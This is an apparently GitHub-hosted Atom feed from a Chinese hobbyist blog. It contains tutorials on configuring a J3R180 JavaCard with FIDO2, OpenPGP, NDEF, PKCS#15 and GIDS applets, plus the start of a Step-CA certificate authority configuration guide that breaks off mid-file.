-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathatom.xml
More file actions
530 lines (297 loc) · 374 KB
/
atom.xml
File metadata and controls
530 lines (297 loc) · 374 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>ThinkAlone</title>
<subtitle>In solitude where we are least alone. ----Lord Byron</subtitle>
<link href="https://thinkalone.win/atom.xml" rel="self"/>
<link href="https://thinkalone.win/"/>
<updated>2026-04-01T04:00:00.000Z</updated>
<id>https://thinkalone.win/</id>
<author>
<name>Disappear9</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>JavaCard 上手</title>
<link href="https://thinkalone.win/Play-with-JavaCard.html"/>
<id>https://thinkalone.win/Play-with-JavaCard.html</id>
<published>2026-03-01T04:00:00.000Z</published>
<updated>2026-04-01T04:00:00.000Z</updated>
<content type="html"><![CDATA[<h3 id="材料准备"><a href="#材料准备" class="headerlink" title="材料准备"></a>材料准备</h3><p>Javacard (TB搜 J3R180 ¥20-30 要SECID版,记得问卖家密钥)<br>智能卡读卡器 (TB搜 pcsc读卡器/ccid读卡器 ¥30-50,更建议加钱上双界面的,或者买一个便宜的接触式的再买一个好一些的非接触式的日常用) </p><hr><h3 id="环境确认"><a href="#环境确认" class="headerlink" title="环境确认"></a>环境确认</h3><p>操作系统:<br>  Windows 10 LTSB 21H2<br>软件版本:<br>  gpg4win 5.0.1 (gpg 2.5.17)<br>  OpenSC 0.26.1<br>  Global Platform Pro v20.08.12<br>  Temurin JDK 21.0.10+7-LTS<br>  Python 3.13 </p><span id="more"></span> <h3 id="准备卡片"><a href="#准备卡片" class="headerlink" title="准备卡片"></a>准备卡片</h3><p>卡片到手后第一件事先改掉默认的密钥 </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">openssl rand <span class="literal">-hex</span> <span class="number">16</span> <span class="comment">#运行3次,生成三组密钥,分别对应enc,mac,dek</span></span><br><span class="line">!!!千万要保存好,丢失了卡就可以扔了!!!</span><br></pre></td></tr></table></figure><p>修改密钥:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">java <span class="literal">-jar</span> gp.jar `</span><br><span class="line"> <span class="literal">--key-enc</span> old<span class="literal">-key</span> ` </span><br><span class="line"> <span class="literal">--key-mac</span> ole<span class="literal">-key</span> ` </span><br><span class="line"> <span class="literal">--key-dek</span> old<span class="literal">-key</span> ` </span><br><span class="line"> <span class="literal">--lock-enc</span> <span class="built_in">new-key</span> <span class="literal">--lock-mac</span> <span class="built_in">new-key</span> <span class="literal">--lock-dek</span> <span class="built_in">new-key</span></span><br></pre></td></tr></table></figure><h3 id="JCAlgTest"><a href="#JCAlgTest" class="headerlink" title="JCAlgTest"></a>JCAlgTest</h3><p>先来跑个测试看看到手的卡正不正常、支持哪些算法<br>从<a href="https://github.com/crocs-muni/JCAlgTest">JCAlgTest</a>最新版本(当前最新版是AlgTest_dist_1.8.3.zip)<br>安装Applet </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">java <span class="literal">-jar</span> gp.jar <span class="literal">--install</span> AlgTest_v1.<span class="number">8.2</span>_jc305.cap `</span><br><span class="line"> <span class="literal">--key-enc</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-mac</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-dek</span> <span class="built_in">new-key</span> `</span><br></pre></td></tr></table></figure><p>如果jc305的Applet装不进去,依次尝试jc304 -> jc222<br>如果jc304也装不上,那剩下的教程就不用看了,这说明你买到的卡芯片大概率不是J3R180,且 JavaCard support version 低于 3.0.4 </p><p>运行<code>AlgTestJClient</code></p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java <span class="literal">-jar</span> AlgTestJClient.jar</span><br></pre></td></tr></table></figure><p>选择 <code>1 -> SUPPORTED ALGORITHMS</code> 测试支持的算法<br>测试需要跑5分钟左右,最后会生成一个csv文件<br>打开csv文件,记下 <code>CPLC.ICSerialNumber</code> 最好写在卡上方便区分<br>搜索 <code>TYPE_RSA_PRIVATE LENGTH_RSA_3072</code> 如果后面显示的是no,则在安装OpenPGP Applet或IsoApplet时只能使用文件名含2048的。 </p><h3 id="FIDO2"><a href="#FIDO2" class="headerlink" title="FIDO2"></a>FIDO2</h3><p>从<a href="https://github.com/BryanJacobs/FIDO2Applet">FIDO2Applet</a>下载工程ZIP包,在从Releases下载Applet(FIDO2.cap)<br>解压工程ZIP包备用,后面要用到工程里的脚本 </p><p>注意:当前(2026/3/1)GPP必须使用v20.08.12,在这之后的版本处理TLV有问题会导致后面注入证书的操作报错。 </p><p>安装Applet </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">java <span class="literal">-jar</span> gp.jar <span class="literal">--install</span> FIDO2.cap `</span><br><span class="line"> <span class="literal">--params</span> a800f50505061820071904000818200918fe0a1904000b190400 `</span><br><span class="line"> <span class="literal">--key-enc</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-mac</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-dek</span> <span class="built_in">new-key</span> `</span><br></pre></td></tr></table></figure><p>注入证书<br>注意:当前(2026/3/1)Python必须使用3.12,不然pyscard装不上(或者自己手动改下代码)。 </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">python <span class="literal">-m</span> venv venv</span><br><span class="line">venv\Scripts\Activate.ps1</span><br><span class="line">pip install <span class="literal">-r</span> FIDO2Applet<span class="literal">-main</span>/requirements.txt</span><br><span class="line">python FIDO2Applet<span class="literal">-main</span>/install_attestation_cert.py</span><br></pre></td></tr></table></figure><h3 id="OpenPGP"><a href="#OpenPGP" class="headerlink" title="OpenPGP"></a>OpenPGP</h3><p>从<a href="https://github.com/github-af/SmartPGP">SmartPGP</a>下载Applet<br>建议使用RSA 2048或3072的Applet,更推荐用NIST P-384,因为卡上跑RSA的速度还是太慢了 </p><p>使用以下脚本生成序列号:</p><figure class="highlight python"><figcaption><span>gen_sn.py</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> secrets</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"></span><br><span class="line"><span class="comment"># anything in fff0 to fffe is for unmanaged random assignment of serial numbers</span></span><br><span class="line">_MANUFACTURER = <span class="string">"fff5"</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">_make_card</span>():</span><br><span class="line"> <span class="comment"># SN is 8 digits, so 4 bytes shown as hex</span></span><br><span class="line"> sn = secrets.token_hex(<span class="number">4</span>)</span><br><span class="line"> aid = <span class="string">f"d276000124010304<span class="subst">{_MANUFACTURER}</span><span class="subst">{sn}</span>0000"</span></span><br><span class="line"> <span class="built_in">print</span>(<span class="string">f"Assigning serial number <span class="subst">{sn}</span> for manufacturer <span class="subst">{_MANUFACTURER}</span>"</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"--create "</span> + aid)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> _make_card()</span><br></pre></td></tr></table></figure><p>安装Applet,将<code>--create</code>后的内容替换为上面脚本生成的 </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">java <span class="literal">-jar</span> gp.jar <span class="literal">--install</span> SmartPGPApplet<span class="literal">-rsa_up_to_3072</span>.cap `</span><br><span class="line"> <span class="literal">--create</span> ************************** `</span><br><span class="line"> <span class="literal">--key-enc</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-mac</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-dek</span> <span class="built_in">new-key</span> `</span><br></pre></td></tr></table></figure><p>OpenPGP的使用可以参照:<a href="https://thinkalone.win/canokey-canary.html#OpenPGP">Canokey Canary上手#OpenPGP</a></p><h3 id="NDEF"><a href="#NDEF" class="headerlink" title="NDEF"></a>NDEF</h3><p>从<a href="https://github.com/OpenJavaCard/openjavacard-ndef/tree/master/prebuilt">openjavacard-ndef</a>下载预编译的Applet </p><p>安装Applet </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">java <span class="literal">-jar</span> gp.jar <span class="literal">--install</span> openjavacard<span class="literal">-ndef-full</span>.cap `</span><br><span class="line"> <span class="literal">--params</span> <span class="number">8102000082020800</span> `</span><br><span class="line"> <span class="literal">--create</span> D2760000850101 `</span><br><span class="line"> <span class="literal">--key-enc</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-mac</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-dek</span> <span class="built_in">new-key</span> `</span><br></pre></td></tr></table></figure><p>这会创建一个有2K存储空间可重复擦写的tag,详细的参数设置<a href="https://github.com/OpenJavaCard/openjavacard-ndef/blob/master/doc/install.md">参考这里</a>。</p><h3 id="PKCS11-15"><a href="#PKCS11-15" class="headerlink" title="PKCS11/15"></a>PKCS11/15</h3><p>这个Applet需要自己编译<a href="https://github.com/philipWendland/IsoApplet">IsoApplet</a> </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 为了方便配置环境,换到Debian下操作</span></span><br><span class="line">git <span class="built_in">clone</span> https://github.com/philipWendland/IsoApplet</span><br><span class="line"><span class="built_in">cd</span> IsoApplet</span><br><span class="line">git submodule init</span><br><span class="line">git submodule update</span><br></pre></td></tr></table></figure><p>修改 <code>IsoApplet.java</code> 允许导入私钥 </p><figure class="highlight java"><figcaption><span>IsoApplet.java</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="type">boolean</span> <span class="variable">DEF_PRIVATE_KEY_IMPORT_ALLOWED</span> <span class="operator">=</span> <span class="literal">true</span>;</span><br></pre></td></tr></table></figure><p>如果你的卡不支持RSA4096,则需要注释掉 <code>IsoApplet.java</code> 中测试RSA4096的部分 </p><figure class="highlight java"><figcaption><span>IsoApplet.java</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"> <span class="comment">// API features: probe card support for 4096 bit RSA keys</span></span><br><span class="line">api_features &= ~API_FEATURE_RSA_4096;</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> try {</span></span><br><span class="line"><span class="comment"> RSAPrivateCrtKey testKey = (RSAPrivateCrtKey)KeyBuilder.buildKey(KeyBuilder.TYPE_RSA_CRT_PRIVATE, KeyBuilder.LENGTH_RSA_4096, false);</span></span><br><span class="line"><span class="comment"> api_features |= API_FEATURE_RSA_4096;</span></span><br><span class="line"><span class="comment"> } catch (CryptoException e) {</span></span><br><span class="line"><span class="comment"> if(e.getReason() == CryptoException.NO_SUCH_ALGORITHM) {</span></span><br><span class="line"><span class="comment"> api_features &= ~API_FEATURE_RSA_4096;</span></span><br><span class="line"><span class="comment"> } else {</span></span><br><span class="line"><span class="comment"> throw e;</span></span><br><span class="line"><span class="comment"> }</span></span><br><span class="line"><span class="comment"> }</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure><p>注意:当前(2026/4/1),IsoApplet导入RSA4096密钥会出错,我分别向OpenSC和IsoApplet提交了pr,但是IsoApplet的作者似乎有重构的打算所以并没有直接采用,目前还在等待修复<br><a href="https://github.com/philipWendland/IsoApplet/pull/46">Fix RSA4096 import</a><br><a href="https://github.com/OpenSC/OpenSC/pull/3632">Fix IsoApplet hard coded algorithm_ref</a><br>如果需要使用RSA4096密钥,要么卡上生成,要么按照pr手动修改代码。 </p><p>我们启一个Docker防止配置的环境与主机的冲突: </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> docker run -it -v ./IsoApplet:/workdir --name jc_build ubuntu:22.04</span><br><span class="line"><span class="built_in">sudo</span> apt update</span><br><span class="line"><span class="built_in">sudo</span> apt install openjdk-8-jdk ant</span><br><span class="line"><span class="built_in">sudo</span> update-java-alternatives -s java-1.8.0-openjdk-amd64</span><br><span class="line"><span class="built_in">cd</span> /workdir</span><br><span class="line">ant</span><br></pre></td></tr></table></figure><p>编译后得到 <code>IsoApplet.cap</code><br>当然,你也可以<a href="/attachments/Play-with-JavaCard/IsoApplet.7z">直接使用我编译好的cap</a> </p><p>安装Applet </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">java <span class="literal">-jar</span> gp.jar <span class="literal">--install</span> IsoApplet.cap `</span><br><span class="line"> <span class="literal">--key-enc</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-mac</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-dek</span> <span class="built_in">new-key</span> `</span><br></pre></td></tr></table></figure><p>初始化 </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 生成一个32位的随机序列号</span></span><br><span class="line">openssl rand <span class="literal">-hex</span> <span class="number">16</span></span><br><span class="line">pkcs15<span class="literal">-init</span> <span class="literal">--create-pkcs15</span> <span class="literal">--serial</span> <span class="number">48</span>c32f6a878b839a</span><br></pre></td></tr></table></figure><p>使用案例参考:<a href="https://github.com/philipWendland/IsoApplet/wiki/Using-the-IsoApplet-with-OpenSSH">Using-the-IsoApplet-with-OpenSSH</a> </p><h3 id="VeraCrypt"><a href="#VeraCrypt" class="headerlink" title="VeraCrypt"></a>VeraCrypt</h3><p>VeraCrypt可以直接使用存储在符合PKCS #11(2.0或更高版本)标准且允许用户在令牌/卡上存储文件(数据对象)的安全令牌或智能卡上的密钥文件。<a href="https://veracrypt.jp/zh-cn/Keyfiles%20in%20VeraCrypt.html">操作步骤见VeraCrypt文档</a></p><p>有两种方式:<br>1.存到 OpenPGP Applet 的 PrivDO3(Private Data Object 3) 中<br>2.存到 IsoApplet 的 PKCS #15 中</p><h4 id="PrivDO3"><a href="#PrivDO3" class="headerlink" title="PrivDO3"></a>PrivDO3</h4><p>默认情况下直接按VeraCrypt的文档操作,密钥文件会被存入PrivDO1,直接运行 <code>gpg --card-edit</code> 不需要验证PIN就可以直接读取到: </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">PS</span> C:\Temp> gpg <span class="literal">--card-edit</span></span><br><span class="line"></span><br><span class="line">Manufacturer .....: unmanaged S/N range</span><br><span class="line">......</span><br><span class="line">Private <span class="keyword">DO</span> <span class="number">1</span> .....: DO1XXXXXXXXXXXXXXXXX <<<<<<<<<<<<<<</span><br><span class="line">Signature PIN ....: forced</span><br></pre></td></tr></table></figure><p>所以更推荐使用这个库:<a href="https://github.com/czietz/openpgp-privdo3-pkcs11">openpgp-privdo3-pkcs11</a>,把密钥文件存进 DO 3。<br>从Releases下载对应的 dll/so 文件后按工程 README 操作。 </p><h4 id="PKCS"><a href="#PKCS" class="headerlink" title="PKCS"></a>PKCS</h4><p>1.点击 VeraCrypt 菜单栏的 工具 > 密钥文件生成器<br>2.密钥文件大小设置在 64-256 字节之间,生成后保存<br>3.点击 VeraCrypt 菜单栏的 工具 > 管理安全口令牌密钥文件<br>4.输入设置的PIN码验证<br>5.点击 “导入密钥文件到令牌”,然后选择刚刚生成的文件 </p><h3 id="GIDS"><a href="#GIDS" class="headerlink" title="GIDS"></a>GIDS</h3><p>注意:GidsApplet和IsoApplet只能二选一 </p><p>从<a href="https://github.com/vletoux/GidsApplet/releases">GidsApplet</a>下载预编译的Applet </p><p>安装Applet </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">java <span class="literal">-jar</span> gp.jar <span class="literal">--install</span> GidsApplet.cap `</span><br><span class="line"> <span class="literal">--key-enc</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-mac</span> <span class="built_in">new-key</span> `</span><br><span class="line"> <span class="literal">--key-dek</span> <span class="built_in">new-key</span> `</span><br></pre></td></tr></table></figure><p>初始化 </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 生成一个48位的随机序列号</span></span><br><span class="line">openssl rand <span class="literal">-hex</span> <span class="number">24</span></span><br><span class="line"><span class="comment"># 初始化</span></span><br><span class="line">gids<span class="literal">-tool</span> <span class="literal">-X</span></span><br><span class="line"><span class="comment"># 导入证书(RSA2048)</span></span><br><span class="line">certutil <span class="literal">-csp</span> <span class="string">"Microsoft Base Smart Card Crypto Provider"</span> <span class="literal">-importpfx</span> <span class="literal">-p</span> <passphrase> <file.p12></span><br><span class="line">或</span><br><span class="line">pkcs15<span class="literal">-init</span> <span class="literal">--auth-id</span> <span class="number">80</span> <span class="literal">--pin</span> <pin> <span class="literal">--verify-pin</span> <span class="operator">-f</span> PKCS12 <span class="literal">--passphrase</span> <span class="string">"<passphrase>"</span> <span class="literal">-S</span> <file.p12></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><h3 id="材料准备"><a href="#材料准备" class="headerlink" title="材料准备"></a>材料准备</h3><p>Javacard (TB搜 J3R180 ¥20-30 要SECID版,记得问卖家密钥)<br>智能卡读卡器 (TB搜 pcsc读卡器&#x2F;ccid读卡器 ¥30-50,更建议加钱上双界面的,或者买一个便宜的接触式的再买一个好一些的非接触式的日常用) </p>
<hr>
<h3 id="环境确认"><a href="#环境确认" class="headerlink" title="环境确认"></a>环境确认</h3><p>操作系统:<br>&emsp;&emsp;Windows 10 LTSB 21H2<br>软件版本:<br>&emsp;&emsp;gpg4win 5.0.1 (gpg 2.5.17)<br>&emsp;&emsp;OpenSC 0.26.1<br>&emsp;&emsp;Global Platform Pro v20.08.12<br>&emsp;&emsp;Temurin JDK 21.0.10+7-LTS<br>&emsp;&emsp;Python 3.13 </p></summary>
<category term="折腾那些事" scheme="https://thinkalone.win/categories/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>灵车!开创! Step-CA 日常使用教程</title>
<link href="https://thinkalone.win/Using-step-ca.html"/>
<id>https://thinkalone.win/Using-step-ca.html</id>
<published>2026-01-09T04:00:00.000Z</published>
<updated>2026-04-01T04:00:00.000Z</updated>
<content type="html"><![CDATA[<p>前几天总算抽空把咕了快一年的自建灵车CA的教程写完了:<a href="https://thinkalone.win/build-ca-with-picohsm.html">使用 Pico HSM 和 step-ca 自建一个CA</a><br>建完以后总是要拿来用一用玩一玩的,那么这一篇幅就写一些 Step-CA 的使用教程吧,顺便也给自己留个参考。 </p><hr><span id="more"></span> <h3 id="ACME"><a href="#ACME" class="headerlink" title="ACME"></a>ACME</h3><h4 id="修改默认配置"><a href="#修改默认配置" class="headerlink" title="修改默认配置"></a>修改默认配置</h4><p>为了安全 Step-CA 默认签出的证书只有24小时的有效期,这对于我们来说是完全没有必要的,先来把它修改到7天 </p><p>编辑<code>step-ca/config/ca.json</code> </p><figure class="highlight json"><figcaption><span>ca.json</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">{</span></span><br><span class="line"><span class="attr">"type"</span><span class="punctuation">:</span> <span class="string">"ACME"</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">"name"</span><span class="punctuation">:</span> <span class="string">"acme"</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">"claims"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"><span class="attr">"maxTLSCertDuration"</span><span class="punctuation">:</span> <span class="string">"336h"</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">"minTLSCertDuration"</span><span class="punctuation">:</span> <span class="string">"24h"</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">"defaultTLSCertDuration"</span><span class="punctuation">:</span> <span class="string">"168h"</span></span><br><span class="line"><span class="punctuation">}</span></span><br><span class="line"><span class="punctuation">}</span></span><br></pre></td></tr></table></figure><p>开启CRL功能 </p><p>编辑 <code>step-ca/config/ca.json</code> </p><figure class="highlight json"><figcaption><span>ca.json</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">"insecureAddress"</span><span class="punctuation">:</span> <span class="string">":9001"</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">"crl"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"enabled"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"idpURL"</span><span class="punctuation">:</span> <span class="string">"http://ca.lab.d9lab.eu.org/1.0/crl"</span></span><br><span class="line"><span class="punctuation">}</span><span class="punctuation">,</span></span><br></pre></td></tr></table></figure><p>创建模板 <code>/etc/step-ca/templates/x509/leaf.tpl</code> </p><figure class="highlight json"><figcaption><span>leaf.tpl</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"subject"</span><span class="punctuation">:</span> <span class="punctuation">{</span> <span class="punctuation">{</span> toJson .Subject <span class="punctuation">}</span> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"sans"</span><span class="punctuation">:</span> <span class="punctuation">{</span> <span class="punctuation">{</span> toJson .SANs <span class="punctuation">}</span> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="punctuation">{</span> <span class="punctuation">{</span>- if typeIs <span class="string">"*rsa.PublicKey"</span> .Insecure.CR.PublicKey <span class="punctuation">}</span> <span class="punctuation">}</span></span><br><span class="line"> <span class="attr">"keyUsage"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"keyEncipherment"</span><span class="punctuation">,</span> <span class="string">"digitalSignature"</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="punctuation">{</span> <span class="punctuation">{</span>- else <span class="punctuation">}</span> <span class="punctuation">}</span></span><br><span class="line"> <span class="attr">"keyUsage"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"digitalSignature"</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="punctuation">{</span> <span class="punctuation">{</span>- end <span class="punctuation">}</span> <span class="punctuation">}</span></span><br><span class="line"> <span class="attr">"extKeyUsage"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"serverAuth"</span><span class="punctuation">,</span> <span class="string">"clientAuth"</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"crlDistributionPoints"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"http://ca.lab.d9lab.eu.org/1.0/crl"</span><span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">}</span></span><br></pre></td></tr></table></figure><p>编辑 <code>step-ca/config/ca.json</code><br>设置acme和JWK provisioner使用模板 </p><figure class="highlight json"><figcaption><span>ca.json</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">......</span><br><span class="line"> <span class="attr">"claims"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"maxTLSCertDuration"</span><span class="punctuation">:</span> <span class="string">"336h"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"minTLSCertDuration"</span><span class="punctuation">:</span> <span class="string">"24h"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"defaultTLSCertDuration"</span><span class="punctuation">:</span> <span class="string">"168h"</span></span><br><span class="line"> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"options"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"x509"</span><span class="punctuation">:</span> <span 